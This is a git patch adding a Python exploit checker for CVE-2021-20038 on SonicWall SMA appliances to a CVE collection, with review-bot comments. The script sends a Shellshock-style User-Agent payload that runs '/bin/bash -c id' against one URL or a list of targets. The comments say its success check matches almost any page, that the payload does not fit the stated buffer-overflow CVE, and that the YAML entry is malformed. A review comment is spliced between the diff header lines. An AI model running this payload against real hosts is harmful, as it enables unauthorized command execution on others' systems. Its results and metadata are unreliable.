From ffdc0ff813b1a34ffcdc07098f052b9f01cbca03 Mon Sep 17 00:00:00 2001
From: torsan
Date: Tue, 9 May 2023 13:02:03 +0800
Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2021-20038?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../2021/CVE-2021-20038/CVE-2021-20038.py | 68 +++++++++++++++++++
.../2021/CVE-2021-20038/README.md | 9 +++
.../2021/yaml/CVE-2021-20038.yaml | 19 ++++++
other_list.yaml | 2 +
4 files changed, 98 insertions(+)
create mode 100644 cve/apache-Httpd/2021/CVE-2021-20038/CVE-2021-20038.py
create mode 100644 cve/apache-Httpd/2021/CVE-2021-20038/README.md
create mode 100644 cve/apache-Httpd/2021/yaml/CVE-2021-20038.yaml
diff --git a/cve/apache-Httpd/2021/CVE-2021-20038/CVE-2021-20038.py b/cve/apache-Httpd/2021/CVE-2021-20038/CVE-2021-20038.py
new file mode 100644
index 00000000..158cde4a
--- /dev/null
+++ b/cve/apache-Httpd/2021/CVE-2021-20038/CVE-2021-20038.py
@@ -0,0 +1,68 @@
+import requests
+import urllib3
+import sys
+from urllib import parse
+
+
+requests.packages.urllib3.disable_warnings()
+
+def banner():
+ print('baby test')
+
+def help():
+ print(' SonicWall RCE -h 查看帮助 ')
+ print(' SonicWall RCE -u 输入待检测url ')
+ print(' SonicWall RCE -f 输入待检测文件 ')
+
+def poc(url):
+ path="/cgi-bin/jarrewrite.sh"
+ vulnurl=url + path
+ #print(vulnurl)
+ headers = {
+ "User-Agent": "() { :; }; echo ; /bin/bash -c id",
+}
+ try:
+ res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+ if "id" in res.text and res.status_code==200:
+ print(res.text+url+"is vuln 漏洞存在")
+ else:
+ print(url+"is not vuln 漏洞不存在")
+ except Exception as e:
+ print(e)
+
+def poc1(files):
+ for url in open(files):
+ url=url.strip()
+ path="/cgi-bin/jarrewrite.sh"
+ vulnurl=url + path
+ #print(vulnurl)
+ headers = {
+ "User-Agent": "() { :; }; echo ; /bin/bash -c id",
+ }
+ try:
+ res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+ if "id" in res.text and res.status_code==200:
+ print("[*] "+res.text+url+"is vuln 漏洞存在")
+ else:
+ print("[*] "+url+"is not vuln 漏洞不存在")
+ except Exception as e:
+ print(e)
+
+if __name__ == '__main__':
+ try:
+ banner()
+ print('by baby')
+ cmd1=sys.argv[1]
+
+ if cmd1=='-h':
+ help()
+ elif cmd1=='-u':
+ cmd2=sys.argv[2]
+ poc(cmd2)
+ elif cmd1=='-f':
+ cmd2=sys.argv[2]
+ poc1(cmd2)
+ else:
+ print("请输入正确参数,或者-h查看帮助")
+ except:
+ print("输入-h查看帮助")
\ No newline at end of file
diff --git a/cve/apache-Httpd/2021/CVE-2021-20038/README.md b/cve/apache-Httpd/2021/CVE-2021-20038/README.md
new file mode 100644
index 00000000..8e3778df
--- /dev/null
+++ b/cve/apache-Httpd/2021/CVE-2021-20038/README.md
@@ -0,0 +1,9 @@
+# SonicWallSSL-VPN_RCE
+CVE-2021-20038
+
+命令行传参
+-h 查看帮助
+-u 指定url
+-f 指定file文件
+
+file内部的格式需添加http/https头
diff --git a/cve/apache-Httpd/2021/yaml/CVE-2021-20038.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-20038.yaml
new file mode 100644
index 00000000..f0246c5f
--- /dev/null
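Review bot: The vulnerability check shared by `poc` and `poc1`, `if "id" in res.text and res.status_code==200:`, tests for the two-letter substring "id", which appears in practically any HTML response (`id=` attributes, "valid", "hidden"), so every host that answers 200 on `/cgi-bin/jarrewrite.sh` is reported as vulnerable; match the output of the injected command instead, e.g. add `import re` at the top and use `if res.status_code == 200 and re.search(r"uid=\d+\(", res.text):`. The User-Agent value `() { :; }; echo ; /bin/bash -c id` is a Shellshock-style function-definition payload, whereas the YAML added in this same commit describes CVE-2021-20038 as a stack-based buffer overflow in the appliance's mod_cgi environment-variable handling, so a hit here appears to indicate Shellshock exposure of that CGI rather than this CVE and a miss does not clear the host — this deserves a comment in the script and a sentence in the README. `poc1` repeats the body of `poc` line for line and never closes the input file; `with open(files) as fh:` followed by `for line in fh: poc(line.strip())` removes both problems. The bare `except:` in the `__main__` block also hides the actual failure (a missing argument raises `IndexError` and only the help hint is printed), and `urllib3` and `parse` are imported but never used.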
+++ b/cve/apache-Httpd/2021/yaml/CVE-2021-20038.yaml
@@ -0,0 +1,19 @@
+id: CVE-2021-20038
+source: https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE
+info:
+ name:SonicWall 安全移动接入 (SMA) 系列解决方案简化了端到端安全远程访问,可跨本地、云和混合数据中心访问托管的资源,对应用程序实施策略访问控制,在用户和设备标识之间建立信任关系,之后可对应用进行多层安全控制,让用户可随时随地安全工作。
+ severity: critical
+ description: |
+ A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
+ scope-of-influence:
+ SMA 200, 210, 400, 410 and 500v firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20038#match-7894400
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-20038
+ cwe-id: CWE-787, CWE-121
+ cnvd-id: None
+ kve-id: None
+ tags: cve2021,Apache,RCE
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 3082ba01..06280aaf 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -40,6 +40,8 @@ cve:
 apache-Struts:
 - CVE-2017-9805
 - CVE-2018-11776
+ apache-Httpd:
+ - CVE-2021-20038
 unzip:
 - CVE-2022-0529
 django:
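Review bot: `name:SonicWall 安全移动接入 …` inside the `info` block has no space after the colon, so a YAML loader reads the whole line as a plain scalar rather than a `name` key, and with `severity: critical` following as a mapping entry the `info` block will not parse as a mapping; change it to `name: SonicWall …` (the collapsed diff hides indentation, so confirm the fix with a loader). The `description` added here says the flaw is in the SMA100 appliance's bundled httpd mod_cgi, yet the file lives under `cve/apache-Httpd/` and carries the tag `Apache`, so anyone filtering the corpus by product will take this for an upstream Apache httpd vulnerability; if the schema allows it, a `sonicwall` or `sma100` tag (and a matching directory) would be less misleading. The `name` text is also product marketing copy rather than a vulnerability title; something like `name: SonicWall SMA100 mod_cgi stack-based buffer overflow (CVE-2021-20038)` would make the entry searchable.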